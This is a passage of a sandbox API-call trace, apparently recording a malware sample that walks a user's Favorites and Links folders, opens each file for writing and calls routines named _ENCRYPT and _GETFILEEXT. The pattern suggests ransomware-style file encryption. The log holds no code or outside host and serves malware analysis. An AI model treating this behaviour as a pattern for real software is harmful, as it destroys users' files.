Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 0x90add8 [0180.769] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.769] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.769] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.769] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.769] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.770] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.770] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.770] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.770] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.770] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.770] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.771] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.771] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.771] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.771] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.771] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.771] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.771] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.772] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.772] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.772] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.772] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.772] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.772] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0180.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.772] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.772] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.772] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.772] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 0x90add8 [0180.773] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.774] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.774] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 0x90add8 [0180.774] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.774] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.774] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.774] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.774] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.774] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.774] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.774] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.774] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.775] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.775] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.776] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.777] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.777] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.777] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.777] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.777] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.777] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.777] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.777] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.777] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.777] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.777] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.777] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0180.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.778] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.778] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.778] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.778] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0x90add8 [0180.779] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.779] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.779] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0x90add8 [0180.780] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.780] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.780] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.780] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.780] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.780] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.780] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.780] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.780] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.780] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.780] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.782] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.784] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.784] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.784] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.784] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.784] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.784] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.784] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.784] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.784] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.784] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.797] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.797] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0180.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.797] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.797] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.797] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.797] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0180.799] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.799] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.799] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0180.800] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.800] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.800] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.800] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.800] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.800] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.800] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.800] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.800] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.800] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.800] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.801] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.803] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.803] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.803] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.803] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.803] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.803] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.803] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.803] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.803] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.803] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.803] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.803] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0180.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nk", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lnk", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lnk", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.804] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.804] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.804] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.804] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Desktop.lnk", cAlternateFileName="")) returned 0x90add8 [0180.805] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.805] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.805] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Desktop.lnk", cAlternateFileName="")) returned 0x90add8 [0180.806] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.806] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.806] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.806] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.806] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.806] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.806] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.806] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.806] PeekMessageW (in: 